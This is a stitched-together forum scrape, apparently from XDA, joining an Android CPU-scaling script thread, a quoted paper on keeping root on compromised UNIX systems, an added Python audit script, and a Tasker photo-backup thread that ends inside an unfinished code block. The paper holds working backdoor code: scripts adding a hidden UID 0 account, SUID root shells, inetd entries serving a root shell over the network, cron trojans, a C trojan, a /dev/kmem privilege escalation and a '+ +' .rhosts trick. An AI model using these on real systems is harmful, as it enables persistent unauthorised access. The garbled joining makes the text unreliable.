I modified the original rookeemod-oxygen script, so that you can supply limits in array form, eg:
LIMITS=( [10]=384000 [30]=691200 [50]=806400 [75]=998400)
It is attached to this post
First time I used bash, so if it isn't correct, please correct me.
I tested it and it works
Credits go to original creators, see copyright notice.
Code:
#!/system/bin/sh
#
# screenstate_scaling - switch CPU frequency governor on screen state change
# originally by [email protected] (FloHimself)
# mod teppic74 / xda - 12/10/2010
# Changelog:
# * Test for battery charging/full - if so, use alternative settings.
# * Allow for alternative frequencies when battery is below 30, 20 and 10%
# Modified by twicejr / xda - 15/01/2011 - made alternative frequencies work with an array, for more dynamic configurability.
# Modifications Copyright 2010
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved.
# ( note: options for freqs: 245000 384000 422400 460800 499200 537600 576000 614400 652800 691200 729600 768000 806400 844800 883200 921600 960000 998400 1036800 1075200 1113600 )
AWAKE_GOVERNOR="interactive"
AWAKE_GOVERNOR_FREQENCY_MAX="1113600"
AWAKE_GOVERNOR_FREQENCY_MIN="245000"
AWAKE_SAMPLING_RATE="40000"
AWAKE_CHARGING_GOVERNOR="interactive"
AWAKE_GOVERNOR_CHARGING_MAX="1113600"
AWAKE_GOVERNOR_CHARGING_MIN="499200"
SLEEP_GOVERNOR="interactive"
# irrelevant max for powersave
SLEEP_GOVERNOR_FREQENCY_MAX="245000"
SLEEP_GOVERNOR_FREQENCY_MIN="245000"
#LIMITS=( [10]=384000 [20]=460800 [30]=614400 [40]=729600 [50]=768000 [60]=806400 [70]=883200 [80]=998400 )
LIMITS=( [10]=384000 [30]=691200 [50]=806400 [75]=998400 )
SETCPU="com.mhuang.overclocking"
(while [ 1 ]
do
    LIMIT_REACHED="0"
    # Blocks until the screen (framebuffer) wakes up
    AWAKE=`cat /sys/power/wait_for_fb_wake`
    BSTAT=`cat /sys/class/power_supply/battery/status`
    if [ "$BSTAT" = "Charging" ] || [ "$BSTAT" = "Full" ] && [ ! "`pidof $SETCPU`" ]; then
        echo $AWAKE_GOVERNOR_CHARGING_MIN > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
        echo $AWAKE_GOVERNOR_CHARGING_MAX > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
        echo $AWAKE_CHARGING_GOVERNOR > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
        log -p i -t screenstate_scaling "*** awake ***: $BSTAT - switching CPU frequency governor to -> $AWAKE_CHARGING_GOVERNOR"
    elif [ "$AWAKE" = "awake" ] && [ ! "`pidof $SETCPU`" ]; then
        echo $AWAKE_GOVERNOR_FREQENCY_MIN > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
        echo $AWAKE_GOVERNOR > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
        BATT=`cat /sys/class/power_supply/battery/capacity`
        # LIMITS keys are battery percentages; stop at the first threshold the battery is below
        for PERCENTAGE in ${!LIMITS[@]} ;
        do
            if [ "$BATT" -lt "$PERCENTAGE" ]; then
                echo ${LIMITS[$PERCENTAGE]} > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
                LIMIT_REACHED="1"
                break
            fi
        done
        # No threshold matched: allow the full maximum frequency
        # (fixed: the test needs a space before "]" and a "then")
        if [ "$LIMIT_REACHED" = "0" ]; then
            echo $AWAKE_GOVERNOR_FREQENCY_MAX > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
        fi
        if [ "$AWAKE_GOVERNOR" = "ondemand" ]; then
            echo $AWAKE_SAMPLING_RATE > /sys/devices/system/cpu/cpufreq/ondemand/sampling_rate
        fi
        log -p i -t screenstate_scaling "*** awake ***: switching CPU frequency governor to -> $AWAKE_GOVERNOR"
        AWAKE=
    fi
    # Blocks until the screen goes to sleep
    SLEEPING=`cat /sys/power/wait_for_fb_sleep`
    if [ "$SLEEPING" = "sleeping" ] && [ ! "`pidof $SETCPU`" ]; then
        echo $SLEEP_GOVERNOR_FREQENCY_MIN > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
        echo $SLEEP_GOVERNOR_FREQENCY_MAX > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
        echo $SLEEP_GOVERNOR > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
        log -p i -t screenstate_scaling "*** sleeping ***: switching CPU frequency governor to -> $SLEEP_GOVERNOR"
        SLEEPING=
    fi
done &)
i dont want to sound silly, but isnt it "easier" to simply use SetCPU?
waebi said:
i dont want to sound silly, but isnt it "easier" to simply use SetCPU?
Yes it is, but i think that in oxygen clean rom is more important
I find it better than having yet another app boot up at start.
Wont the handset be sluggish to wake from 245MHZ and powersave governor?!
Jagdish84 said:
Wont the handset be sluggish to wake from 245MHZ and powersave governor?!
I dunno, I set it to interactive: SLEEP_GOVERNOR="interactive"
.
I just think that interactive in combination with scaling down is just as "power-saving" as ondemand in the end, and it feels faster
twicejr said:
I dunno, I set it to interactive: SLEEP_GOVERNOR="interactive"
.
I just think that interactive in combination with scaling down is just as "power-saving" as ondemand in the end, and it feels faster
I agree, i got mixed up didnt notice you were using interactive
i would give it a shot but i aint using oxygen rom and ssts aint lying in init.d...
nice script nonetheless
I thought this was an interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of reentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system,
they offer reentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you get the idea
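Seen from the administrator's side, items [1] to [5] of the paper quoted above all leave artifacts that a periodic audit can catch: extra UID 0 or password-less accounts in the 7-field passwd file, inetd.conf entries that hand a connection to a shell, and SUID files under /tmp. The following Python audit is an added example, not part of the quoted paper or of the original post; the sample file contents, account names and function names are constructed for illustration.

```python
import os
import stat

# Shell basenames that should never be the program behind an inetd service.
SHELLS = {"sh", "csh", "tcsh", "ksh", "bash", "zsh"}

# Constructed sample data (not taken from any real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/:/bin/false
svcacct::0:0:service:/home/svc:/bin/csh
alice:x:1001:100:Alice:/home/alice:/bin/sh
sync:x:0:1:sync:/:/bin/sync
"""

SAMPLE_INETD = """\
# service type proto wait user program argv...
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
daytime stream tcp nowait root internal
daytime stream tcp nowait /bin/sh sh -i
echo stream tcp nowait root /bin/sh sh -i
"""


def audit_passwd(text):
    """Return (line number, account, reason) for suspicious passwd entries."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, fields[0], "malformed: expected 7 fields"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((n, name, "UID 0 on non-root account"))
        if password == "":
            findings.append((n, name, "empty password field"))
    return findings


def audit_inetd(text):
    """Return (line number, service, reason) for suspicious inetd.conf entries."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            findings.append((n, fields[0], "malformed: fewer than 6 fields"))
            continue
        user, rest = fields[4], fields[5:]
        # A path in field (5) means the user field was dropped and the
        # remaining fields shifted left.
        if "/" in user:
            findings.append((n, fields[0], "user field holds a path"))
        if any(os.path.basename(tok) in SHELLS for tok in [user] + rest):
            findings.append((n, fields[0], "connection is handed to a shell"))
    return findings


def find_setuid(root):
    """Return sorted (path, owner uid, mode) for SUID/SGID regular files under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_uid, oct(st.st_mode & 0o7777)))
    return sorted(hits)


if __name__ == "__main__":
    for n, who, why in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd:{n}: {who}: {why}")
    for n, svc, why in audit_inetd(SAMPLE_INETD):
        print(f"inetd.conf:{n}: {svc}: {why}")
    for path, uid, mode in find_setuid("/tmp"):
        print(f"setuid: {path} owner={uid} mode={mode}")
```

On a real host, pass the contents of /etc/passwd and /etc/inetd.conf to the two parsers and compare the findings against a known-good baseline, since some systems ship legitimate entries that match these rules.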
Dear XDA-Members
After some have requested me to post my Tasker profile, here is a noob-friendly walkthrough.
This is the first time I make a tutorial like this so any corrections are more than welcome (since English isn't my native language)
I haven't made this fully on my own, some ideas I got from other posts.
So here it goes:
It was hard to find a good trigger for the task to start and I decided to add it to opening/closing of the camera app.
Profiles:
Application -> (Your default photo app (you can add more than one)
Start task:
Variable / Variable set / name = %Camerastart / To %TIMES - 15 //Set a variable so you can later compare which photos are new and which are old
Exit task:
1. File / List Files / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
2. Task / For / Variable = %File / Items = %Files(1 // For every variable do the next loop
-3. File / Test File / Type = Modified / Data = %File / Store result In = %Filetime / Continue Task After Error = True // Look when the photo was taken (modified)
-4. Task / If / Condition = %Filetime > %Camerastart // Compare the variables to see if the photo is either new or old
--5. File / Copy File / From = %File / To = DCIM/Backup (Location of folder you want to copy the new photos to) / (Use root = true // optional) // If true copy the photo to another map
-6. Task / End If // Self explanatory
7. Task / End for // End the loop
I hope you guys liked this tutorial and I helped some of you out.
I also uploaded the .txt file, rename it to .xml so you can easily import it to Tasker. (This was made with the newest version (4.5u1)
Edit: Forgot to add one thing, add a file named .nomedia to the folder where you place the extra photos (Do this with root explorer or some other that displays hidden items), this will prevent the photos from displaying in the gallery app.
// Old
Dear XDA-Members,
I'm not sure if something like this already exists but after a while of searching I haven't found anything like this.
We probably all had one of those moments in our life that we took a photo of something or someone that we wanted to keep really badly but someone forced us to delete it from the gallery.
So my idea was that after a photo gets taken by the camera app and saved to the default location /sdcard/DCIM/camera (or other place, dependence on the camera app (possibly customizable setting?)) a backup is instantly made to a folder (of choice) that isn't displayed in any gallery. And I know dropbox could instantly sync this to the cloud but this firstly drains my data plan and you can't save it locally and only on the cloud (not talking about the huge amount of battery that is drained).
Maybe it's easier to make a camera app that saves a photo on 2 places (one displayed in the gallery and the other one is saved in a secret folder that you can assign yourself and see with the most file browsers.)
I hope you guys like this idea and maybe someone could work this out if they have the time for it.
tldr; Lightweight app that secretly 'backups' photos to a secret folder that isn't displayed in the gallery app.
Sorry for my English, it isn't my native language.
Tasker can do that
Tasker?
mushipkw said:
Tasker can do that
What would be the trigger event then?
I have explored all the tasker options but weren't able to find anything that could reproduce this.
Tasker worked
Mikhail5555 said:
What would be the trigger event then?
I have explored all the tasker options but weren't able to find anything that could reproduce this.
Wow, I can't believe how powerful tasker actually is.
I managed to make a task for backing up photos made by my standard camera. It took me an hour but it is working now.
If anyone interested in the task send me a pm and I will send the task.
Excellent, just what i was looking for. Great tutorial.
---------- Post added at 01:29 AM ---------- Previous post was at 01:19 AM ----------
Might want to change the title of the post
Since your request was pretty much solved by yourself.
GerManiac said:
Excellent, just what i was looking for. Great tutorial.
---------- Post added at 01:29 AM ---------- Previous post was at 01:19 AM ----------
Might want to change the title of the post
Since your request was pretty much solved by yourself.
Completely forgot about the title, sorry [emoji15]
How you import?
eloko said:
How you import?
Just follow the instructions and make it yourself, the directories might not work if you import
eloko said:
How you import?
Otherwise download the .txt file, rename it to .xml and import it into tasker. (Don't forget to change the dirs)
Mikhail5555 said:
Otherwise download the .txt file, rename it to .xml and import it into tasker. (Don't forget to change the dirs)
I don't see the option to import.
I try when I have the chance to be on pc.
Thanks
Mikhail5555 said:
Exit task:
1. File / List FIles / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
Thanks for the very nice tutorial of yours
I have a question or rather a problem!
What if I wanted to make a backup of videos too, how should I add to the list?
M S T F said:
Thanks for the very nice tutorial of yours
I have a question or rather a problem!
What if I wanted to make a backup of videos too, how should I add to the list?
Thanks for the nice words, it is actually pretty easy to add more files to the list of items that are getting copied.
Exit task:
1. File / List Files / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
Just edit the "Match = *.jpg" to for instance "Match = *.jpg/*.mp4/*.png".
The / means OR so you can add almost all the file extensions that you want and/or need.
Don't forget the scan will take longer the more items you add.
Mikhail5555 said:
Thanks for the nice words, it is actually pretty easy to add more files to the list of items that are getting copied.
Exit task:
1. File / List Files / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
Just edit the "Match = *.jpg" to, for instance, "Match = *.jpg/*.mp4/*.png".
The / means OR so you can add almost all the file extensions that you want and/or need.
Don't forget the scan will take longer the more items you add.
Thanks for the reply,
After adding mp4 to the list I ran into an error, as you can see in the following screenshot.
Actually the remaining photos after the first video file in the folder aren't backed up, but the first video file itself is copied to the destination folder.
Any idea what could be the reason?
M S T F said:
Thanks for the reply,
After adding mp4 to the list I ran into an error, as you can see in the following screenshot.
Actually the remaining photos after the first video file in the folder aren't backed up, but the first video file itself is copied to the destination folder.
Any idea what could be the reason?
Try disabling 'use root', I'm not sure why the copying times out though.
Could you also show the bottom lines from the error that Tasker gives?
Mikhail5555 said:
Try disabling 'use root', I'm not sure why the copying times out though.
Could you also show the bottom lines from the error that Tasker gives?
Here I have copied the whole log for your consideration. I am looking forward to a solution.
Code:
16.28.14/Variables doreplresult: |%File| -> |/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4|
16.28.14/Variables doreplresult: |%File| -> |/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4|
16.28.14/Shell runSync test -e '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell have process
16.28.14/Shell write cmd: test -e '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process timeout timer 3000ms for: test -e '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process-thread ID 530
16.28.14/Shell joined with 530
16.28.14/Shell exit result: 0
16.28.14/Shell non-null timeout
16.28.14/Shell runSync test -f '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell have process
16.28.14/Shell write cmd: test -f '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process timeout timer 3000ms for: test -f '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process-thread ID 532
16.28.14/Shell joined with 532
16.28.14/Shell exit result: 0
16.28.14/Shell non-null timeout
16.28.14/Shell runSync test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell have process
16.28.14/Shell write cmd: test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process timeout timer 3000ms for: test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process-thread ID 534
16.28.15/Shell joined with 534
16.28.15/Shell exit result: 1
16.28.15/Shell non-null timeout
16.28.15/Shell runSync test -e '/storage/extSdCard/Camera-Backup' root: true timeout: 3000
16.28.15/Shell have process
16.28.15/Shell write cmd: test -e '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 3000ms for: test -e '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 536
16.28.15/Shell joined with 536
16.28.15/Shell exit result: 0
16.28.15/Shell non-null timeout
16.28.15/Shell runSync test -f '/storage/extSdCard/Camera-Backup' root: true timeout: 3000
16.28.15/Shell have process
16.28.15/Shell write cmd: test -f '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 3000ms for: test -f '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 538
16.28.15/Shell joined with 538
16.28.15/Shell exit result: 1
16.28.15/Shell non-null timeout
16.28.15/Shell runSync test -d '/storage/extSdCard/Camera-Backup' root: true timeout: 3000
16.28.15/Shell have process
16.28.15/Shell write cmd: test -d '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 3000ms for: test -d '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 540
16.28.15/Shell joined with 540
16.28.15/Shell exit result: 0
16.28.15/Shell non-null timeout
16.28.15/Shell runSync cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup' root: true timeout: 7000
16.28.15/Shell have process
16.28.15/Shell write cmd: cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 7000ms for: cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 542
16.28.22/Shell joined with 542
16.28.22/Shell exit result: 9
16.28.22/Shell non-null timeout
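An added example, not part of the original posts: a small Python parser for the Tasker shell log format shown above. It pairs each runSync call with its run time and exit result, then reports the calls that failed after running for their whole timeout. The function names are assumptions of this example, and the sample lines are copied from the log above.

```python
import re

# Sample input: eight lines copied from the log posted above.
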